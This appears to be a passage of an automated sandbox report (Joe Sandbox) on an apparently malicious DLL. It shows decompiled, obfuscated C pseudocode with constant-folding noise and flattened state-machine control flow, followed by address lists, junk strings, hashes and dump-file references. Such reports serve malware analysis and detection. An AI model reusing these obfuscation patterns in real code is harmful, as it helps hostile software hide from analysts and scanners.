				_v232 = _v232 ^ 0x58faffd4;
				_v280 = 0xd1aac6;
				_v280 = _v280 >> 0xc;
				_v280 = _v280 >> 3;
				_v280 = _v280 | 0xe15f3d77;
				_v280 = _v280 ^ 0xe1581caf;
				_v204 = 0x586478;
				_v204 = _v204 << 6;
				_v204 = _v204 * 0x45;
				_v204 = _v204 ^ 0xf4c06de0;
				_v236 = 0x7a6b49;
				_v236 = _v236 + 0xfffff53d;
				_v236 = _v236 + 0xffff6bfb;
				_v236 = _v236 ^ 0x00796dc4;
				_v164 = 0x73b924;
				_v164 = _v164 * 0x37;
				_v164 = _v164 ^ 0x18d89939;
				_v140 = 0xd61f2b;
				_v140 = _v140 | 0xe12df20d;
				_v140 = _v140 ^ 0xe1fed234;
				_v264 = 0xb74ee;
				_v264 = _v264 | 0x369c0611;
				_v264 = _v264 + 0xffffce97;
				_v264 = _v264 | 0x56131c90;
				_v264 = _v264 ^ 0x76993c7a;
				_v188 = 0x86359d;
				_v188 = _v188 | 0xee9d04be;
				_v188 = _v188 >> 7;
				_v188 = _v188 ^ 0x01d63d7e;
				_v196 = 0x62a6bf;
				_v196 = _v196 ^ 0x13f7b83b;
				_v196 = _v196 | 0xfa5dbf29;
				_v196 = _v196 ^ 0xfbd613bb;
				_v272 = 0x497fb9;
				_v272 = _v272 >> 8;
				_v272 = _v272 + 0x46f;
				_t524 = 0x15;
				_v272 = _v272 / _t524;
				_v272 = _v272 ^ 0x0006a64c;
				_v284 = 0x22ff47;
				_v284 = _v284 << 9;
				_v284 = _v284 + 0x2a7e;
				_v284 = _v284 | 0xa3b8d71b;
				_v284 = _v284 ^ 0xe7f75fc1;
				_v168 = 0x5effde;
				_v168 = _v168 << 0xd;
				_v168 = _v168 ^ 0xdff336ff;
				_v160 = 0x143f18;
				_v160 = _v160 >> 8;
				_v160 = _v160 ^ 0x00026d5e;
				_v212 = 0x56f8ef;
				_t525 = 0x74;
				_v212 = _v212 / _t525;
				_v212 = _v212 >> 1;
				_v212 = _v212 ^ 0x00041781;
				_v184 = 0x78f661;
				_t526 = 0x24;
				_v184 = _v184 / _t526;
				_v184 = _v184 << 6;
				_v184 = _v184 ^ 0x00d4b0ae;
				_v132 = 0xfc57e1;
				_v132 = _v132 + 0x95ac;
				_v132 = _v132 ^ 0x00fd4e4f;
				_v224 = 0x75249d;
				_v224 = _v224 >> 2;
				_v224 = _v224 << 5;
				_v224 = _v224 ^ 0x03a0d1e2;
				_v200 = 0x1dd68f;
				_t527 = 0x1e;
				_v200 = _v200 / _t527;
				_v200 = _v200 << 5;
				_v200 = _v200 ^ 0x001cc6a7;
				_v192 = 0xfcdaf1;
				_v192 = _v192 + 0xd795;
				_v192 = _v192 >> 9;
				_v192 = _v192 ^ 0x00058c90;
				_v216 = 0xbb9259;
				_t528 = 0x34;
				_v216 = _v216 / _t528;
				_t529 = 0x52;
				_v216 = _v216 * 0x13;
				_v216 = _v216 ^ 0x004a95ed;
				_v276 = 0x57a41b;
				_v276 = _v276 ^ 0xd020dbe5;
				_v276 = _v276 | 0x8ab5e016;
				_v276 = _v276 + 0xffff22d9;
				_v276 = _v276 ^ 0xdaf55aee;
				_v244 = 0x1f39e;
				_v244 = _v244 >> 7;
				_v244 = _v244 | 0x3f4cee99;
				_v244 = _v244 / _t529;
				_v244 = _v244 ^ 0x00c55e53;
				_v208 = 0x8cb9ec;
				_v208 = _v208 ^ 0x591dda69;
				_v208 = _v208 + 0xffff44b3;
				_v208 = _v208 ^ 0x5993fa0d;
				_v152 = 0xb0343f;
				_v152 = _v152 << 0xf;
				_v152 = _v152 ^ 0x1a1cc008;
				_v252 = 0xe1a21c;
				_v252 = _v252 | 0x952b17c7;
				_v252 = _v252 >> 0xb;
				_v252 = _v252 + 0x3107;
				_v252 = _v252 ^ 0x00168178;
				_v176 = 0x1f45f4;
				_v176 = _v176 + 0xffffb6c3;
				_v176 = _v176 >> 3;
				_v176 = _v176 ^ 0x000294fa;
				_v144 = 0xd98b7;
				_v144 = _v144 + 0xdfca;
				_v144 = _v144 ^ 0x00064cf8;
				_v124 = 0xf97c3c;
				_v124 = _v124 << 0xe;
				_v124 = _v124 ^ 0x5f01afd1;
				_v220 = 0xbf67e3;
				_v220 = _v220 >> 0xf;
				_v220 = _v220 >> 8;
				_v220 = _v220 ^ 0x0002d002;
				_v148 = 0xfa1be7;
				_v148 = _v148 * 0x4c;
				_v148 = _v148 ^ 0x4a419838;
				_v228 = 0xe7473d;
				_v228 = _v228 + 0x3507;
				_v228 = _v228 ^ 0x00ead38c;
				_v156 = 0x66a8ab;
				_v156 = _v156 | 0x79d54c9c;
				_v156 = _v156 ^ 0x79fe3884;
				_v240 = 0x18be1a;
				_v240 = _v240 ^ 0x7e543587;
				_v240 = _v240 * 0x68;
				_v240 = _v240 | 0xe3fcfdd3;
				_v240 = _v240 ^ 0xeff94d70;
				_v172 = 0x9913c4;
				_v172 = _v172 * 0x77;
				_v172 = _v172 + 0xffffc63d;
				_v172 = _v172 ^ 0x47206855;
				_v248 = 0xd44183;
				_v248 = _v248 + 0xd298;
				_v248 = _v248 << 4;
				_v248 = _v248 ^ 0x50766a5f;
				_v248 = _v248 ^ 0x5d272bff;
				_v256 = 0x31eb30;
				_v256 = _v256 ^ 0xb25f58d4;
				_v256 = _v256 ^ 0x46bb6998;
				_t530 = 0x74;
				_v256 = _v256 / _t530;
				_v256 = _v256 ^ 0x021c5309;
				while(1) {
					L1:
					_t531 = _v120;
					goto L2;
					do {
						while(1) {
							L2:
							_t543 = _t479 - 0x3286a26;
							if(_t543 > 0) {
								break;
							}
							if(_t543 == 0) {
								E02B52B09(_v220, _v116, _v148, _v228);
								_t479 = 0x483cb7c;
								continue;
							}
							if(_t479 == 0xd18f0a) {
								_t455 = E02B357B8( *_t477, _v288, _v136,  *((intOrPtr*)(_t477 + 4)), _v128,  &_v32, _v232);
								_t539 =  &(_t539[6]);
								if(_t455 == 0) {
									L33:
									return _v108;
								}
								_t479 = 0x98446cf;
								continue;
							}
							if(_t479 == 0x2686f46) {
								_t534 =  *_t537;
								E02B35026(_v184, _v132, _v224, _t534, _v200);
								_t535 = _t534 + _v260;
								E02B4C9B0(_v192, _t535, _v216, _v112, _v116, _v276);
								_push(_v152);
								_t536 = _t535 + _v112;
								_t492 = _t531;
								_push(_v208);
								_push(_t536);
								E02B371B3(_t492, _v244);
								_t532 =  &(_t536[_t531]);
								_t541 =  &(_t539[0xa]);
								_t519 = _t536;
								if(_t536 >= _t532) {
									L16:
									_push(_t492);
									_push(_t492);
									_t464 = E02B4CCA0(0, 0xe);
									_t539 =  &(_t541[4]);
									_t479 = 0x3286a26;
									 *((char*)(_t464 + _t536)) = 0;
									_t533 = _v104;
									goto L1;
								} else {
									goto L13;
								}
								do {
									L13:
									_t492 = _v268;
									if(( *_t519 & 0x000000ff) == _t492) {
										 *_t519 = 0xc3;
									}
									_t519 =  &(_t519[1]);
								} while (_t519 < _t532);
								goto L16;
							}
							if(_t479 == 0x2d8a01e) {
								_t479 = 0xd18f0a;
								continue;
							}
							if(_t479 != 0x3056d50) {
								goto L30;
							}
							_push(_t479);
							_push(_t479);
							_t469 = E02B3C5D8(_a4);
							_t539 =  &(_t539[3]);
							 *_t537 = _t469;
							if(_t469 == 0) {
								_t479 = 0x3286a26;
							} else {
								_v108 = 1;
								_t479 = 0x2686f46;
							}
						}
						if(_t479 == 0x34d1508) {
							if(E02B3FB8E(_v164,  &_v100,  &_v116, _v140) == 0) {
								_t479 = 0x483cb7c;
								goto L30;
							}
							_t479 = 0x5c08967;
							goto L2;
						}
						if(_t479 == 0x483cb7c) {
							E02B52B09(_v156, _v100, _v240, _v172);
							goto L33;
						}
						if(_t479 == 0x5c08967) {
							_push(_t479);
							_push(_t479);
							_t531 = E02B4CCA0(_v248, _v256);
							_t539 =  &(_t539[4]);
							_t479 = 0x3056d50;
							_v120 = _t531;
							_a4 = _v180 + _t531 + _v112;
							goto L2;
						}
						if(_t479 != 0x98446cf) {
							goto L30;
						}
						_v92 =  &_v32;
						_v68 =  *_t477;
						_v64 =  *((intOrPtr*)(_t477 + 4));
						_v60 = _t533;
						_v88 = 0x20;
						_t475 = E02B3E7DE(_v280, _v204,  &_v92,  &_v100, _v236);
						_t539 =  &(_t539[3]);
						if(_t475 == 0) {
							goto L33;
						}
						_t479 = 0x34d1508;
						goto L2;
						L30:
					} while (_t479 != 0x5241bf8);
					goto L33;
				}
			}

0x02b45780
0x02b4578a
0x02b4578b
0x02b45792
0x02b45794
0x02b45796
0x02b4579d
0x02b457a4
0x02b457a5
0x02b457a6
0x02b457ab
0x02b457bf
0x02b457c7
0x02b457c8
0x02b457cd
0x02b457d2
0x02b457d5
0x02b457d6
0x02b457de
0x02b457e7
0x02b457ec
0x02b457f7
0x02b457fb
0x02b457ff
0x02b4580a
0x02b45815
0x02b45820
0x02b4582b
0x02b45833
0x02b4583b
0x02b45843
0x02b4584b
0x02b45853
0x02b4585b
0x02b45864
0x02b45867
0x02b4586b
0x02b45870
0x02b45878
0x02b4588b
0x02b45892
0x02b4589d
0x02b458a8
0x02b458b0
0x02b458b7
0x02b458c2
0x02b458ca
0x02b458d2
0x02b458da
0x02b458e2
0x02b458ea
0x02b458ef
0x02b458f4
0x02b458fc
0x02b45904
0x02b4590c
0x02b45916
0x02b4591a
0x02b45922
0x02b4592a
0x02b45932
0x02b4593a
0x02b45942
0x02b45955
0x02b4595e
0x02b45969
0x02b45974
0x02b4597f
0x02b4598a
0x02b45992
0x02b4599a
0x02b459a2
0x02b459aa
0x02b459b2
0x02b459ba
0x02b459c2
0x02b459c7
0x02b459cf
0x02b459d7
0x02b459df
0x02b459e7
0x02b459ef
0x02b459f7
0x02b459fc
0x02b45a0a
0x02b45a0f
0x02b45a15
0x02b45a1d
0x02b45a25
0x02b45a2a
0x02b45a32
0x02b45a3a
0x02b45a42
0x02b45a4d
0x02b45a55
0x02b45a60
0x02b45a6b
0x02b45a73
0x02b45a7e
0x02b45a8a
0x02b45a8f
0x02b45a95
0x02b45a99
0x02b45aa1
0x02b45aad
0x02b45ab2
0x02b45ab8
0x02b45abd
0x02b45ac5
0x02b45ad0
0x02b45adb
0x02b45ae6
0x02b45aee
0x02b45af3
0x02b45af8
0x02b45b00
0x02b45b0c
0x02b45b11
0x02b45b15
0x02b45b1a
0x02b45b22
0x02b45b2a
0x02b45b32
0x02b45b37
0x02b45b41
0x02b45b4d
0x02b45b52
0x02b45b5d
0x02b45b60
0x02b45b64
0x02b45b6c
0x02b45b74
0x02b45b7c
0x02b45b84
0x02b45b8c
0x02b45b94
0x02b45b9c
0x02b45ba1
0x02b45baf
0x02b45bb3
0x02b45bbb
0x02b45bc3
0x02b45bcb
0x02b45bd3
0x02b45bdb
0x02b45be6
0x02b45bee
0x02b45bf9
0x02b45c01
0x02b45c09
0x02b45c0e
0x02b45c16
0x02b45c1e
0x02b45c29
0x02b45c34
0x02b45c3c
0x02b45c47
0x02b45c52
0x02b45c5d
0x02b45c68
0x02b45c73
0x02b45c7b
0x02b45c86
0x02b45c8e
0x02b45c93
0x02b45c98
0x02b45ca0
0x02b45cb3
0x02b45cba
0x02b45cc5
0x02b45ccd
0x02b45cdd
0x02b45ce5
0x02b45cf0
0x02b45cfb
0x02b45d06
0x02b45d0e
0x02b45d1b
0x02b45d1f
0x02b45d27
0x02b45d2f
0x02b45d42
0x02b45d49
0x02b45d54
0x02b45d5f
0x02b45d67
0x02b45d6f
0x02b45d74
0x02b45d7c
0x02b45d84
0x02b45d8c
0x02b45d94
0x02b45da2
0x02b45da5
0x02b45da9
0x02b45db1
0x02b45db1
0x02b45db1
0x02b45db1
0x02b45db8
0x02b45db8
0x02b45db8
0x02b45db8
0x02b45dbe
0x00000000
0x00000000
0x02b45dc4
0x02b45f56
0x02b45f5d
0x00000000
0x02b45f5d
0x02b45dd0
0x02b45f26
0x02b45f2b
0x02b45f30
0x02b460a6
0x02b460b7
0x02b460b7
0x02b45f36
0x00000000
0x02b45f36
0x02b45ddc
0x02b45e43
0x02b45e59
0x02b45e65
0x02b45e86
0x02b45e8b
0x02b45e92
0x02b45e99
0x02b45e9b
0x02b45ea3
0x02b45ea4
0x02b45ea9
0x02b45eab
0x02b45eae
0x02b45eb2
0x02b45ec7
0x02b45ee0
0x02b45ee1
0x02b45ee6
0x02b45eeb
0x02b45eee
0x02b45ef3
0x02b45ef7
0x00000000
0x00000000
0x00000000
0x00000000
0x02b45eb4
0x02b45eb4
0x02b45eb4
0x02b45ebd
0x02b45ebf
0x02b45ebf
0x02b45ec2
0x02b45ec3
0x00000000
0x02b45eb4
0x02b45de4
0x02b45e35
0x00000000
0x02b45e35
0x02b45dec
0x00000000
0x00000000
0x02b45e08
0x02b45e09
0x02b45e0d
0x02b45e12
0x02b45e15
0x02b45e1a
0x02b45e2e
0x02b45e1c
0x02b45e1c
0x02b45e27
0x02b45e27
0x02b45e1a
0x02b45f6d
0x02b46067
0x02b46073
0x00000000
0x02b46073
0x02b46069
0x00000000
0x02b46069
0x02b45f79
0x02b4609f
0x00000000
0x02b460a5
0x02b45f85
0x02b4600c
0x02b4600d
0x02b4601b
0x02b4601d
0x02b46024
0x02b4602b
0x02b46039
0x00000000
0x02b46039
0x02b45f8d
0x00000000
0x00000000
0x02b45fa6
0x02b45faf
0x02b45fb9
0x02b45fcf
0x02b45fd7
0x02b45fe2
0x02b45fe7
0x02b45fec
0x00000000
0x00000000
0x02b45ff2
0x00000000
0x02b46078
0x02b46078
0x00000000
0x02b46084

Strings

, xrefs: 02B45FD7
~*, xrefs: 02B45A2A
Uh G, xrefs: 02B45D54
xdX, xrefs: 02B45904
=G, xrefs: 02B45CC5
01, xrefs: 02B45D84
_jvP, xrefs: 02B45D74
Ikz, xrefs: 02B45922
pk, xrefs: 02B458A8
w=_, xrefs: 02B458F4

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: pk$ $01$=G$Ikz$Uh G$_jvP$w=_$xdX$~*
API String ID: 0-1860247402
Opcode ID: fa76ad5acae243c1c6f25466b63a0bb5d20f34d56f5c0675485de595a933ec53
Instruction ID: 6e145ab73fa97fc7d49e5b7cd8656263229e437c33d26e6c96f99fed4288417f
Opcode Fuzzy Hash: fa76ad5acae243c1c6f25466b63a0bb5d20f34d56f5c0675485de595a933ec53
Instruction Fuzzy Hash: FA2223711093809FC368CF25C589A9BBBE2FFD5708F508A1DE6D996260DBB19948CF43

Uniqueness

Uniqueness Score: -1.00%

Function 02B47D5B, Relevance: 12.9, Strings: 10, Instructions: 361
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E02B47D5B(void* __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				char _v2080;
				char _v2600;
				signed int _v2604;
				signed int _v2608;
				signed int _v2612;
				signed int _v2616;
				signed int _v2620;
				signed int _v2624;
				signed int _v2628;
				signed int _v2632;
				signed int _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				signed int _v2764;
				signed int _v2768;
				signed int _v2772;
				signed int _v2776;
				signed int _v2780;
				signed int _v2784;
				signed int _v2788;
				signed int _v2792;
				signed int _t420;
				signed int _t442;
				signed int _t443;
				signed int _t444;
				signed int _t445;
				signed int _t446;
				signed int _t447;
				signed int _t448;
				void* _t488;
				void* _t489;
				signed int* _t493;

				_t493 =  &_v2792;
				_v2792 = 0x289571;
				_v2792 = _v2792 | 0xf6df9bca;
				_v2792 = _v2792 + 0xea43;
				_v2792 = _v2792 ^ 0xf7008a17;
				_v2788 = 0xdb8a78;
				_v2788 = _v2788 * 6;
				_t488 = __ecx;
				_t489 = 0x219adc7;
				_t442 = 0x7a;
				_v2788 = _v2788 / _t442;
				_t443 = 0x42;
				_v2788 = _v2788 * 0x3d;
				_v2788 = _v2788 ^ 0x0296dfb6;
				_v2660 = 0xc0a6c5;
				_v2660 = _v2660 << 6;
				_v2660 = _v2660 ^ 0x3025665c;
				_v2692 = 0x3a8fa3;
				_v2692 = _v2692 ^ 0xa120b079;
				_v2692 = _v2692 | 0x9ac88514;
				_v2692 = _v2692 ^ 0xbbd9167d;
				_v2668 = 0xec1a87;
				_v2668 = _v2668 + 0x8cab;
				_v2668 = _v2668 ^ 0x00e348c2;
				_v2628 = 0xecd9a9;
				_v2628 = _v2628 << 9;
				_v2628 = _v2628 ^ 0xd9bcc0eb;
				_v2756 = 0xbae8da;
				_v2756 = _v2756 + 0xefc;
				_v2756 = _v2756 * 0x2c;
				_v2756 = _v2756 ^ 0x76eb1803;
				_v2756 = _v2756 ^ 0x56c3d905;
				_v2780 = 0x787147;
				_v2780 = _v2780 + 0xffff6597;
				_v2780 = _v2780 + 0xffffc18b;
				_v2780 = _v2780 | 0x826dfd4e;
				_v2780 = _v2780 ^ 0x827371e5;
				_v2712 = 0x74bd84;
				_v2712 = _v2712 >> 9;
				_v2712 = _v2712 + 0xbcb6;
				_v2712 = _v2712 ^ 0x0001f6d9;
				_v2680 = 0x714a85;
				_v2680 = _v2680 | 0x3dc400c8;
				_v2680 = _v2680 ^ 0x3df5425d;
				_v2612 = 0xace488;
				_v2612 = _v2612 | 0xd2617c07;
				_v2612 = _v2612 ^ 0xd2e83d7d;
				_v2736 = 0x9a08fa;
				_v2736 = _v2736 + 0x9c03;
				_v2736 = _v2736 << 5;
				_v2736 = _v2736 ^ 0x135d006f;
				_v2652 = 0x41ccd2;
				_v2652 = _v2652 ^ 0x97b2ef27;
				_v2652 = _v2652 ^ 0x97fb61bc;
				_v2764 = 0x9e119e;
				_v2764 = _v2764 << 2;
				_v2764 = _v2764 | 0x268f2d0f;
				_v2764 = _v2764 / _t443;
				_v2764 = _v2764 ^ 0x009ccc86;
				_v2620 = 0x8f6e28;
				_v2620 = _v2620 >> 3;
				_v2620 = _v2620 ^ 0x00104951;
				_v2772 = 0xe21e14;
				_v2772 = _v2772 + 0xffff5b09;
				_v2772 = _v2772 * 0x18;
				_v2772 = _v2772 + 0xc00a;
				_v2772 = _v2772 ^ 0x152b5515;
				_v2608 = 0x3d3ea7;
				_v2608 = _v2608 + 0x63eb;
				_v2608 = _v2608 ^ 0x0030ec7d;
				_v2644 = 0x866304;
				_v2644 = _v2644 + 0x379c;
				_v2644 = _v2644 ^ 0x008e4788;
				_v2604 = 0xe77a6a;
				_t121 =  &_v2604; // 0xe77a6a
				_t444 = 0x63;
				_v2604 =  *_t121 / _t444;
				_v2604 = _v2604 ^ 0x000e0408;
				_v2696 = 0xf5199c;
				_v2696 = _v2696 << 8;
				_v2696 = _v2696 << 3;
				_v2696 = _v2696 ^ 0xa8c2da1f;
				_v2636 = 0xbfea70;
				_v2636 = _v2636 | 0x60f37e4e;
				_v2636 = _v2636 ^ 0x60f450e6;
				_v2720 = 0x6acbb3;
				_t445 = 0x6c;
				_v2720 = _v2720 / _t445;
				_v2720 = _v2720 >> 9;
				_v2720 = _v2720 ^ 0x00013488;
				_v2704 = 0x72224f;
				_v2704 = _v2704 << 9;
				_v2704 = _v2704 + 0xffff0fb2;
				_v2704 = _v2704 ^ 0xe44ad0e5;
				_v2728 = 0xe68b79;
				_v2728 = _v2728 | 0x8e61462a;
				_v2728 = _v2728 >> 1;
				_v2728 = _v2728 ^ 0x477bf727;
				_v2616 = 0x4099b0;
				_v2616 = _v2616 + 0xfa8f;
				_v2616 = _v2616 ^ 0x0048c0a5;
				_v2688 = 0xff8ffd;
				_v2688 = _v2688 ^ 0x53972d47;
				_t446 = 0x60;
				_v2688 = _v2688 / _t446;
				_v2688 = _v2688 ^ 0x00dac0dc;
				_v2744 = 0xc2c855;
				_v2744 = _v2744 | 0x821d7436;
				_t447 = 0x65;
				_v2744 = _v2744 * 0x46;
				_v2744 = _v2744 ^ 0xc93dde39;
				_v2664 = 0x8fcf69;
				_v2664 = _v2664 ^ 0x92a1f028;
				_v2664 = _v2664 ^ 0x922e5d56;
				_v2672 = 0x138bb7;
				_v2672 = _v2672 + 0xffff6c98;
				_v2672 = _v2672 ^ 0x001bead2;
				_v2784 = 0x1d404b;
				_v2784 = _v2784 ^ 0xbb38c348;
				_v2784 = _v2784 >> 0xb;
				_v2784 = _v2784 | 0xeccea58e;
				_v2784 = _v2784 ^ 0xecdc694e;
				_v2676 = 0xbdcffc;
				_v2676 = _v2676 ^ 0x5aef785e;
				_v2676 = _v2676 ^ 0x5a57f2e1;
				_v2768 = 0xceb2dd;
				_v2768 = _v2768 | 0xafbcd5ba;
				_v2768 = _v2768 * 0xf;
				_v2768 = _v2768 / _t447;
				_v2768 = _v2768 ^ 0x00c1507c;
				_v2732 = 0xba5c67;
				_v2732 = _v2732 + 0xffff3085;
				_v2732 = _v2732 ^ 0x29fec498;
				_v2732 = _v2732 ^ 0x29414316;
				_v2740 = 0xfebc70;
				_v2740 = _v2740 >> 6;
				_t448 = 0x4c;
				_v2740 = _v2740 * 0x46;
				_v2740 = _v2740 ^ 0x01107382;
				_v2776 = 0x1fdbbd;
				_v2776 = _v2776 + 0xffff7a05;
				_v2776 = _v2776 << 5;
				_v2776 = _v2776 + 0xffff7a3d;
				_v2776 = _v2776 ^ 0x03eed3d9;
				_v2708 = 0xe5e896;
				_v2708 = _v2708 << 6;
				_v2708 = _v2708 + 0x807d;
				_v2708 = _v2708 ^ 0x3973facc;
				_v2716 = 0xdc1d9;
				_v2716 = _v2716 | 0xfc1937aa;
				_v2716 = _v2716 + 0xffffd03c;
				_v2716 = _v2716 ^ 0xfc1f97ce;
				_v2648 = 0xeb72b6;
				_v2648 = _v2648 >> 8;
				_v2648 = _v2648 ^ 0x0003133b;
				_v2724 = 0x35c70c;
				_v2724 = _v2724 + 0xffff3120;
				_v2724 = _v2724 + 0xda65;
				_v2724 = _v2724 ^ 0x003bd395;
				_v2656 = 0x588c44;
				_v2656 = _v2656 ^ 0x3c8fee8a;
				_v2656 = _v2656 ^ 0x3cdfb996;
				_v2632 = 0xa98095;
				_v2632 = _v2632 + 0xf08e;
				_v2632 = _v2632 ^ 0x00ab49e1;
				_v2640 = 0x908171;
				_v2640 = _v2640 << 0xa;
				_v2640 = _v2640 ^ 0x42069508;
				_v2748 = 0xf99537;
				_v2748 = _v2748 >> 9;
				_v2748 = _v2748 | 0x4d3f7029;
				_v2748 = _v2748 ^ 0x4d356fb4;
				_v2700 = 0xf7c115;
				_v2700 = _v2700 + 0xffffc630;
				_v2700 = _v2700 >> 5;
				_v2700 = _v2700 ^ 0x0003a618;
				_v2624 = 0xf73d89;
				_v2624 = _v2624 * 0x3f;
				_v2624 = _v2624 ^ 0x3cd41ae8;
				_v2684 = 0x237d3e;
				_v2684 = _v2684 + 0xffff7bf2;
				_v2684 = _v2684 << 0xb;
				_v2684 = _v2684 ^ 0x17c7121d;
				_v2752 = 0x3823b3;
				_v2752 = _v2752 * 0x2a;
				_v2752 = _v2752 + 0xffff9ab5;
				_v2752 = _v2752 >> 9;
				_v2752 = _v2752 ^ 0x0000d6a9;
				_v2760 = 0x9d905;
				_t420 = _v2760 / _t448;
				_v2760 = _t420;
				_v2760 = _v2760 + 0xffff5226;
				_v2760 = _v2760 ^ 0x58f88d53;
				_v2760 = _v2760 ^ 0xa70b0c4e;
				while(_t489 != 0x219adc7) {
					if(_t489 == 0x472b880) {
						E02B31A34(_v2744,  &_v1040, _t448, _t448, _v2664, _v2672, _v2784, _t448, _v2792, _v2676);
						_push(_v2776);
						_push(_v2740);
						_push(_v2732);
						E02B52D0A(_v2716, __eflags,  &_v2080, _v2648, _v2724, _v2656, 0x2b3196c,  &_v520,  &_v1040, E02B4E1F8(0x2b3196c, _v2768, __eflags));
						E02B4FECB(_t422, _v2632, _v2640, _v2748, _v2700);
						__eflags = 0;
						return E02B485FF(_v2624, _v2684, 0, 0,  &_v520, 0, _v2752, 0, _v2760);
					}
					_t501 = _t489 - 0x6430241;
					if(_t489 != 0x6430241) {
						L7:
						__eflags = _t489 - 0xc99ad3;
						if(__eflags != 0) {
							continue;
						} else {
							return _t420;
						}
						L10:
						return _t420;
					}
					E02B50DB1(_v2788,  &_v2600, _t501, _v2660, _t448, _v2692);
					 *((short*)(E02B409DD(_v2668,  &_v2600, _v2628, _v2756))) = 0;
					E02B3BAA9(_v2780, _v2712, _t501, _v2680, _v2612,  &_v1560);
					_push(_v2620);
					_push(_v2764);
					_push(_v2652);
					E02B52D0A(_v2608, _t501,  &_v1560, _v2644, _v2604, _v2696, 0x2b3188c,  &_v2080,  &_v2600, E02B4E1F8(0x2b3188c, _v2736, _t501));
					E02B4FECB(_t434, _v2636, _v2720, _v2704, _v2728);
					_t448 = _v2616;
					_t420 = E02B3BFBE( &_v2080, _t488, _v2688);
					_t493 =  &(_t493[0x18]);
					if(_t420 != 0) {
						_t489 = 0x472b880;
						continue;
					}
					goto L10;
				}
				_t489 = 0x6430241;
				goto L7;
			}

0x02b47d5b
0x02b47d61
0x02b47d6a
0x02b47d71
0x02b47d78
0x02b47d7f
0x02b47d90
0x02b47d94
0x02b47d9a
0x02b47da1
0x02b47da6
0x02b47db1
0x02b47db2
0x02b47db6
0x02b47dbe
0x02b47dc9
0x02b47dd1
0x02b47ddc
0x02b47de4
0x02b47dec
0x02b47df4
0x02b47dfc
0x02b47e07
0x02b47e12
0x02b47e1d
0x02b47e28
0x02b47e30
0x02b47e3b
0x02b47e43
0x02b47e50
0x02b47e54
0x02b47e5c
0x02b47e64
0x02b47e6c
0x02b47e74
0x02b47e7c
0x02b47e84
0x02b47e8c
0x02b47e94
0x02b47e99
0x02b47ea1
0x02b47ea9
0x02b47eb4
0x02b47ebf
0x02b47eca
0x02b47ed5
0x02b47ee0
0x02b47eeb
0x02b47ef3
0x02b47efb
0x02b47f00
0x02b47f08
0x02b47f13
0x02b47f1e
0x02b47f29
0x02b47f31
0x02b47f36
0x02b47f44
0x02b47f48
0x02b47f50
0x02b47f5b
0x02b47f63
0x02b47f6e
0x02b47f76
0x02b47f83
0x02b47f87
0x02b47f8f
0x02b47f99
0x02b47fa4
0x02b47faf
0x02b47fba
0x02b47fc5
0x02b47fd0
0x02b47fdb
0x02b47fe6
0x02b47fef
0x02b47ff4
0x02b47ffd
0x02b48008
0x02b48010
0x02b48015
0x02b4801a
0x02b48022
0x02b4802d
0x02b48038
0x02b48043
0x02b4804f
0x02b48054
0x02b4805a
0x02b4805f
0x02b48067
0x02b4806f
0x02b48074
0x02b4807c
0x02b48084
0x02b4808c
0x02b48094
0x02b48098
0x02b480a0
0x02b480ab
0x02b480b6
0x02b480c1
0x02b480c9
0x02b480d5
0x02b480da
0x02b480e0
0x02b480e8
0x02b480f0
0x02b480fd
0x02b480fe
0x02b48102
0x02b4810a
0x02b48115
0x02b48120
0x02b4812b
0x02b48136
0x02b48141
0x02b4814c
0x02b48154
0x02b4815c
0x02b48161
0x02b48169
0x02b48171
0x02b4817c
0x02b48187
0x02b48192
0x02b4819a
0x02b481a7
0x02b481b1
0x02b481b5
0x02b481bd
0x02b481c7
0x02b481d4
0x02b481e1
0x02b481e9
0x02b481f1
0x02b481fd
0x02b481fe
0x02b48202
0x02b4820a
0x02b48212
0x02b4821a
0x02b4821f
0x02b48227
0x02b4822f
0x02b48237
0x02b4823c
0x02b48244
0x02b4824c
0x02b48254
0x02b4825c
0x02b48264
0x02b4826c
0x02b48277
0x02b4827f
0x02b4828a
0x02b48292
0x02b4829a
0x02b482a2
0x02b482aa
0x02b482b5
0x02b482c0
0x02b482cb
0x02b482d6
0x02b482e1
0x02b482ec
0x02b482f7
0x02b482ff
0x02b4830a
0x02b48312
0x02b48317
0x02b4831f
0x02b48327
0x02b4832f
0x02b48337
0x02b4833c
0x02b48344
0x02b48357
0x02b4835e
0x02b48369
0x02b48371
0x02b48379
0x02b4837e
0x02b48386
0x02b48393
0x02b48397
0x02b4839f
0x02b483a4
0x02b483ac
0x02b483b8
0x02b483ba
0x02b483be
0x02b483c6
0x02b483ce
0x02b483d6
0x02b483e4
0x02b48546
0x02b4854b
0x02b48554
0x02b48558
0x02b485a1
0x02b485c1
0x02b485d0
0x00000000
0x02b485f1
0x02b483ea
0x02b483ec
0x02b4850a
0x02b4850a
0x02b48510
0x00000000
0x00000000
0x00000000
0x00000000
0x02b485fe
0x02b485fe
0x02b485fe
0x02b48409
0x02b4842e
0x02b48452
0x02b48457
0x02b48463
0x02b48467
0x02b484b6
0x02b484d6
0x02b484e2
0x02b484f1
0x02b484f6
0x02b484fb
0x02b48501
0x00000000
0x02b48501
0x00000000
0x02b484fb
0x02b48508
0x00000000

Strings

^xZ, xrefs: 02B4817C
}0, xrefs: 02B47FAF
)p?M, xrefs: 02B48317
Gqx, xrefs: 02B47E64
o, xrefs: 02B47F00
$P, xrefs: 02B47D8E
>}#, xrefs: 02B48369
\f%0, xrefs: 02B47DD1
jz, xrefs: 02B47FE6
O"r, xrefs: 02B48067

Memory Dump Source

